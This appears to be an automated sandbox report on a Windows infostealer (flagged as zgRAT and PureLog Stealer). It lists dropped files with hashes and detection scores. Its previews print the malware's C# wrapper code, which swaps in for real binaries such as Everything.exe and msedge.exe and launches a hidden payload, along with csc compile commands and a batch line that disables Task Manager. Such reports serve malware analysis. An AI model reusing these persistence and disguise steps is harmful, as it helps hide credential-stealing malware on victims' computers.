                                                                                                          Preview:..[.S.e.t.t.i.n.g.s.].....R.e.c.t.=.1.0.4.4.....N.u.m.F.i.e.l.d.s.=.4.....R.T.L.=.0.....N.e.x.t.B.u.t.t.o.n.T.e.x.t.=.&.F.i.n.i.s.h.....S.t.a.t.e.=.0.....[.F.i.e.l.d. .1.].....T.y.p.e.=.b.i.t.m.a.p.....L.e.f.t.=.0.....R.i.g.h.t.=.1.0.9.....T.o.p.=.0.....B.o.t.t.o.m.=.1.9.3.....F.l.a.g.s.=.R.E.S.I.Z.E.T.O.F.I.T.....T.e.x.t.=.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.n.s.s.4.7.6.A...t.m.p.\.m.o.d.e.r.n.-.w.i.z.a.r.d...b.m.p.....H.W.N.D.=.3.2.8.8.7.2.....[.F.i.e.l.d. .2.].....T.y.p.e.=.l.a.b.e.l.....L.e.f.t.=.1.2.0.....R.i.g.h.t.=.3.1.5.....T.o.p.=.1.0.....B.o.t.t.o.m.=.3.8.....T.e.x.t.=.C.o.m.p.l.e.t.i.n.g. .E.v.e.r.y.t.h.i.n.g. .S.e.t.u.p.....H.W.N.D.=.1.9.7.8.1.8.....[.F.i.e.l.d. .3.].....T.y.p.e.=.l.a.b.e.l.....L.e.f.t.=.1.2.0.....R.i.g.h.t.=.3.1.5.....T.o.p.=.4.5.....B.o.t.t.o.m.=.8.5.....T.e.x.t.=.E.v.e.r.y.t.h.i.n.g. .h.a.s. .b.e.e.n. .i.n.s.t.a.l.l.e.d. .o.n. .y.o.u.r. .c.o.m.p.u.t.e.r...\.r.\.n.\.r.\.n.C.l.i.c.k. .F.i.n.i.s.h. .t.o. .c.l.o.s.e. .S.e.t.
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\drivEn760.exe
                                                                                                          File Type:PC bitmap, Windows 3.x format, 164 x 314 x 4, image size 26376, resolution 2834 x 2834 px/m, cbSize 26494, bits offset 118
                                                                                                          Category:dropped
                                                                                                          Size (bytes):26494
                                                                                                          Entropy (8bit):1.9568109962493656
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Qwika6aSaaDaVYoG6abuJsnZs5GhI11BayNXPcDrSsUWcSphsWwlEWqCl6aHAX2x:Qoi47a5G8SddzKFIcsOz3Xz
                                                                                                          MD5:CBE40FD2B1EC96DAEDC65DA172D90022
                                                                                                          SHA1:366C216220AA4329DFF6C485FD0E9B0F4F0A7944
                                                                                                          SHA-256:3AD2DC318056D0A2024AF1804EA741146CFC18CC404649A44610CBF8B2056CF2
                                                                                                          SHA-512:62990CB16E37B6B4EFF6AB03571C3A82DCAA21A1D393C3CB01D81F62287777FB0B4B27F8852B5FA71BC975FEAB5BAA486D33F2C58660210E115DE7E2BD34EA63
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:BM~g......v...(.......:............g..................................................................................DDD@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDD@@@@@@..DDD....DDDDDD........................................DDDDDDDDDD....DDDDDDDDD........DD@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDD@@@@DDDDDDDDDD@@@@@@D..DD....DDDDDDD......................................DDDDDDDDDD....DDDDDDDDDD......D..D@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDDD@@@@@DDD..D.....DDDDDD......................................DDDDDDDDD.....DDDDDDDDD......DDD..@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDDD@@@@@@DDDD.......DDDDDD.....................................DDDDDDDDDD....DDDDDDDDDD.....DDDDD..@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDD@@@@@@DDDDDD.......DDDDDD....................................DDDDDDDDD....DDDDDDDDDD......DDDDDD..@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):397
                                                                                                          Entropy (8bit):5.08394378511733
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:V/DNVgtDIbSf+eBL6RfiFkMSf+eBLROQboiFkD:JNVQIbSfhW9iFkMSfhBFkD
                                                                                                          MD5:E6D89A2CAD5A44A402759733797D0D5A
                                                                                                          SHA1:61526342CA581B691D6A950B6C728DB92043E9F1
                                                                                                          SHA-256:7FE4A0909F1A6CF5BB2D3CD21F5A0B4DAFAAED3BEBACC7BC8C7914081A9E14C1
                                                                                                          SHA-512:9ECE01DF638C4252B1C9A37C64252EEA6695D57A7E7E9D00AFBE31F719D45CA8FF991BE128F590923773288E92B3484A75C87885B92E05A7C98AF32A01AA52CD
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files\Everything\Everything.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"); } catch { } }).Start();. }.}.
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):248
                                                                                                          Entropy (8bit):5.0658148716877704
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:Hu+H2L//1xRIU9BzxsjGZxWE8o923fASGWhn:Hu7L//TRZcQy+S
                                                                                                          MD5:0E93113F136FD514D6486ED865B8691D
                                                                                                          SHA1:3F3DAC5D22F507AA4153340636D2091FD0A373F2
                                                                                                          SHA-256:D4061085383DE48029FA9C566C870A53EBA6C0AC5E11C3290D131BE5D1A1C1A1
                                                                                                          SHA-512:B3986E0221851B1CE1DBC354E55831DBB82802DEF8357D1998C3F5ADA8B0FEF1A14A1B64B5B0007889EFA3652FE0D8133BC04AE1AEDAAB2CDEAE3AF6CEE49B75
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files\Everything\Everything.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\pgfcrwpp\pgfcrwpp.0.cs"
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with CRLF, CR line terminators
                                                                                                          Category:modified
                                                                                                          Size (bytes):787
                                                                                                          Entropy (8bit):5.210489327865254
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Kj2I/un/VZty+LKax5DqBVKVrdFAMBJTH:pN/Vm+LK2DcVKdBJj
                                                                                                          MD5:28187CA1408093072D61CABCB9631AE0
                                                                                                          SHA1:BEF5F4BF873F86F42FA579C19A281E9595C13808
                                                                                                          SHA-256:34A91A1A75BE9CD0E4DA3BBEDB563F59049A136E55E83243B0360EFD231A86CA
                                                                                                          SHA-512:BD22FD7D2BB6889C43F104C176C59045F694389C7B22BC5046FAA6FB92D919756D31752D1660AAFEB36FC55C00B01642FA7071110D40637B1B480E17C2C5D6DB
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files\Everything\Everything.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\pgfcrwpp\pgfcrwpp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                          Process:C:\Users\user\Desktop\wxl1r0lntg.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2347946
                                                                                                          Entropy (8bit):7.511778308463523
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:IBJPq9/4rTuPInOgODSegbQddnpKSVVvncFn8O:yRGPIr1UDhvC
                                                                                                          MD5:A79959F25EDA4401D0F5E7B370D6C613
                                                                                                          SHA1:D2F9766917469C7B14BF3300304F3E305977DEEC
                                                                                                          SHA-256:0BC4BE6A914008D39B8934BF6032D64F82D839DD42A441A51EABE3D7DEAF4A32
                                                                                                          SHA-512:261945CCAC0C43458F6B4530B0FFE72F25BFF08B1D7F75D126CBFC05B30172AFF097E5A0C216D11F97042C91C8EEDC95956CE4E82FFAC84646BDDD8C7326E0A3
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\sqls211.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\sqls211.exe, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 68%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):98304
                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):106496
                                                                                                          Entropy (8bit):1.136413900497188
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):415
                                                                                                          Entropy (8bit):5.12549514533064
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLROQboiFkD:JNVQIbSfhWLzIiFkMSfhBFkD
                                                                                                          MD5:851FDDEDF5FAA44C1116CAC43EAA9499
                                                                                                          SHA1:FB28FD1EC273C4031339BA2B6CE6B92289E579E9
                                                                                                          SHA-256:AB3EF8AC9D05A107097F09887703CEFDAD66E10C66F9908D58908176DC642E5E
                                                                                                          SHA-512:0535438E680BE7085918B7989503A7FFA1A74485EFFEED267C21E79B5846CA8C6B36C1685DBD41BE7300B50B2E0E3F92A70EF1CCEB505B1DA2B464B08BC4DB10
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"); } catch { } }).Start();. }.}.
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):266
                                                                                                          Entropy (8bit):5.169215651772023
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923fxN8SEA:Hu7L//TRRzscQy5NoA
                                                                                                          MD5:840EAF33CE190DAC4E9F8CDCA75FF7E0
                                                                                                          SHA1:23084A6DD224413433A175D69134B5543143D989
                                                                                                          SHA-256:D0D495BC2C44C7465195AC06CAE7C67E81DED03B4A2096F374D2AA1F60CC5F6F
                                                                                                          SHA-512:A085B0706A87CE83F160AE0A4A61B06B80C7230BDE0D08F2B673C75DF5BE1AADAF0CD44A8FCB7BC0E172F258E6A28B9A59F4782A67842D24E9D13BCDF0B06FD7
                                                                                                          Malicious:true
                                                                                                          Reputation:unknown
                                                                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.0.cs"
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (384), with CRLF, CR line terminators
                                                                                                          Category:modified
                                                                                                          Size (bytes):805
                                                                                                          Entropy (8bit):5.2353803285928135
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Kj2I/un/VRzstyTSKax5DqBVKVrdFAMBJTH:pN/VRzfTSK2DcVKdBJj
                                                                                                          MD5:9D3A71DD848957EA5B55142A459668DC
                                                                                                          SHA1:841AAAA7631DC59C37E5A17AB9951A52F150A704
                                                                                                          SHA-256:1C588B20431A38D5D12E6336F6A6EC1ED9163978871890CEE720E4266D96F9BE
                                                                                                          SHA-512:2A56C61BAB3BC8B938991DE4CF3232E0BAD58D301415BD47319B5CB75F3D7283175737B846AD37FBE4BD3D27F48A8110AEAC9B42FDF80F541CC717AE4FC242E3
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                          Process:C:\Program Files\Everything\Everything.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20568
                                                                                                          Entropy (8bit):4.711600466249169
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:BdnZLL+Dy9QOL4jWnTef2JFTAiwTMisXZiPgCSjvtM8nbVwoQTXaS+Ztul4AxuMU:rg8TeEFTA+isX/M8nTZ4z8lJCK
                                                                                                          MD5:49B6FF446EDDAF88EA08A7C16792952E
                                                                                                          SHA1:C0DC334F467D867F0E1D3FABD555EBCAC395FC8B
                                                                                                          SHA-256:2FB724DD202047575842AB8B47F7C395B06C84879AF5A1CD5978B3A0111E3580
                                                                                                          SHA-512:77CAEA2889EF3C8396CF333E6F99656CF087BA69E20F86279CF415E9B3EF598A98A0A2BADA407443910EF24B8D51602EF3D1504F3826F0F9837D07DB488BAB2B
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:; Please make sure Everything is not running before modifying this file...[Everything]..window_x=0..window_y=0..window_wide=0..window_high=0..maximized=0..minimized=0..fullscreen=0..ontop=0..bring_into_view=1..alpha=255..match_whole_word=0..match_path=0..match_case=0..match_diacritics=0..match_regex=0..view=0..thumbnail_size=64..thumbnail_fill=0..min_thumbnail_size=32..max_thumbnail_size=256..medium_thumbnail_size=64..large_thumbnail_size=128..extra_large_thumbnail_size=256..thumbnail_load_size=0..thumbnail_overlay_icon=1..shell_max_path=0..allow_multiple_windows=0..allow_multiple_instances=0..run_in_background=1..show_in_taskbar=1..show_tray_icon=1..minimize_to_tray=0..toggle_window_from_tray_icon=0..alternate_row_color=0..show_mouseover=0..check_for_updates_on_startup=0..beta_updates=0..show_highlighted_search_terms=1..text_size=0..hide_empty_search_results=0..clear_selection_on_search=1..show_focus_on_search=0..new_window_key=0..show_window_key=0..toggle_window_key=0..language=1033.
                                                                                                          Process:C:\Program Files\Everything\Everything.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20568
                                                                                                          Entropy (8bit):4.711600466249169
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:BdnZLL+Dy9QOL4jWnTef2JFTAiwTMisXZiPgCSjvtM8nbVwoQTXaS+Ztul4AxuMU:rg8TeEFTA+isX/M8nTZ4z8lJCK
                                                                                                          MD5:49B6FF446EDDAF88EA08A7C16792952E
                                                                                                          SHA1:C0DC334F467D867F0E1D3FABD555EBCAC395FC8B
                                                                                                          SHA-256:2FB724DD202047575842AB8B47F7C395B06C84879AF5A1CD5978B3A0111E3580
                                                                                                          SHA-512:77CAEA2889EF3C8396CF333E6F99656CF087BA69E20F86279CF415E9B3EF598A98A0A2BADA407443910EF24B8D51602EF3D1504F3826F0F9837D07DB488BAB2B
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:; Please make sure Everything is not running before modifying this file...[Everything]..window_x=0..window_y=0..window_wide=0..window_high=0..maximized=0..minimized=0..fullscreen=0..ontop=0..bring_into_view=1..alpha=255..match_whole_word=0..match_path=0..match_case=0..match_diacritics=0..match_regex=0..view=0..thumbnail_size=64..thumbnail_fill=0..min_thumbnail_size=32..max_thumbnail_size=256..medium_thumbnail_size=64..large_thumbnail_size=128..extra_large_thumbnail_size=256..thumbnail_load_size=0..thumbnail_overlay_icon=1..shell_max_path=0..allow_multiple_windows=0..allow_multiple_instances=0..run_in_background=1..show_in_taskbar=1..show_tray_icon=1..minimize_to_tray=0..toggle_window_from_tray_icon=0..alternate_row_color=0..show_mouseover=0..check_for_updates_on_startup=0..beta_updates=0..show_highlighted_search_terms=1..text_size=0..hide_empty_search_results=0..clear_selection_on_search=1..show_focus_on_search=0..new_window_key=0..show_window_key=0..toggle_window_key=0..language=1033.
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\sqls211.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):213
                                                                                                          Entropy (8bit):5.19267498723557
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:k2QlAX+StuH1jhRiI36B+2cQV9NdEpJAcz:k9rVjhR136+icv
                                                                                                          MD5:FE3AF328A3C1AD2712245EA437D47613
                                                                                                          SHA1:2B79946A9B86296CC85A5B42CD4EB5EC750D0AF8
                                                                                                          SHA-256:23E6B4AB5963D8273C7FC2C2BC8CC00F43B52D394008C48D61B0566A9562D41A
                                                                                                          SHA-512:B7677891C88966E435F55A15FF83CB6B1CBE5F67B58745F95E2A4814DCF1A2F123395DC9841A24E237CC17E3609836F08E6DFB606C35C47A54D62E38ED2B6B8D
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:%dSkFdJoiNee%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%qvRncBDzm%..%JgRjOV%"%AppData%\surrogateDriverintoSessionNet/containerwebruntime.exe"%pSw%
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\sqls211.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):226
                                                                                                          Entropy (8bit):5.742217278143619
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:GFtkvwqK+NkLzWbHprFnBaORbM5nCL/ELHm3Xg4sa8DaQXIN:GFFMCzWLphBaORbQCLMjmfs3Da5N
                                                                                                          MD5:41BB352391FB715E18562592B8A1EAEF
                                                                                                          SHA1:B836DCEAB0D0C78EBC4C47894F2FE8D06D4FCF68
                                                                                                          SHA-256:F72B4AD1BB1A2D8E3B4E03082F05AAC7767465B862C43B69B18CFE75DF3C184C
                                                                                                          SHA-512:010BC79E98CC43AED0D9AC3CB5CA6011BC04CDA0F6322FAA2DEC0C2D5D692CE07985B7806FFCBEC8D76DE7C90E7B88332D52AB665EA557C506C194BFCB0995EE
                                                                                                          Malicious:true
                                                                                                          Reputation:unknown
                                                                                                          Preview:#@~^yQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v T!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPrYzw2GlDl]J/!.DKoCY.f.r7+DbUYK?+kdrW.1.Y&z+KA&K6:.K5o 8mYJS~Z~~0msk+AUEAAA==^#~@.
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:ASCII text, with very long lines (572), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):572
                                                                                                          Entropy (8bit):5.885860175731103
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:x8nSbsu+/69mgXqDknzWKH75BoSmgBLKTR43ib/2un:Snia69DnnrBoSmgBLKuyx
                                                                                                          MD5:50194EBD62B7084C07308B3B86198BCC
                                                                                                          SHA1:F6CDEEA224F68C56DA931508CD9D549686CDEE2F
                                                                                                          SHA-256:E696ED1AA7B342B7C9C1E27027E566F76363E90BF498AE5C62DE69CB5B8A8E60
                                                                                                          SHA-512:BFE1FC51FBB605BED393134D6EA7243C22DFDA9E63181AAA0AB792B8E3AD71B012261DE200D6D72EDB03DB952B7E5D8F0A61C0F65CAAB0DF592F5B367A2A54EF
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:lkb7tTFdb12NMuTS2CcOxlSJ9VLjfvA7Zu80JI9OTYeahssS7jrd4NvARS7YHf8p14xcwdItCN4ZG1mQn2m5EgCL88i1KlHyZzjm4Qgdb8brSV3apqvP2ClU1mdy4QibGGARR9WWWIeFFV2nEILd025WNPuSwrjKZ9lMVmIpUY2tifOgt0twEEkOKnEBPEkojTqGtqRc9gJc9LyrBNj68wGVZXBshHaQyNKOzIxCiRxi4IO8yWABenqxNVqVpj41F3ovBk23agYr8haQJC3LGZvKhXAdbbX8W5dBec7NdHl8P9yp5aMmqsvqIdOokZb8JaUDEYwqFqs9yx5hjUiAPuSoKw3ANTmEpmyzovlgofh99v2UiqFQ0atZHq2RevdwDoTL8F2xtBWuNSoZ4icgNWNP2Zr82TC3Cu6VcqVdxRhzE9LzCdX5T6iqaESjY45Z9drcWS6OM9t6zYL3N26Z5GjFMP4XXwE3WHzkRtdtgJtUNl0C3ZVg7fe33mPGXj0a4zksikmeYM3wXP2lY2e8ai50n6qpdXV6SSaXAIdSx1HulrfotorfF29V3uFm
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\sqls211.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2025984
                                                                                                          Entropy (8bit):7.5739640210308465
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:xq9/4rTuPInOgODSegbQddnpKSVVvncFn8:xGPIr1UDhv
                                                                                                          MD5:77967721CE1C8B3F0EB800BD33527897
                                                                                                          SHA1:6CACE6DB7C38EC0F438B9D7A2A323A90E703A904
                                                                                                          SHA-256:524FDB6F99BA45BA54D3445BFFB08D32F63E0642516DA16D4B31B8BA22325BD7
                                                                                                          SHA-512:5C0C90952462704C879125EBF9102796608DD7D8722F84183706BCB4748057ED23894E00F1D6B078AB8D8E7089B818CF9FDE7090302E83B5D0431418EC833165
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?.qg................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......L...|..............7............................................0..........(.... ........8........E....)...=.......*...8$...(.... ....~....{....:....& ....8....*(.... ........8....(.... ....~....{....:....& ....8........0.......... ........8........E........f...1...v...Z...8........~....(T...~....(X... ....?>... ....8....~....:*... ....~....{....:....& ....8....r...ps....z*...... ....8q...~....(L... .... .... ....s....~....(P....... ....~....{....:1...& ....8&.....(.
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):85504
                                                                                                          Entropy (8bit):5.8769270258874755
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                          Reputation:unknown
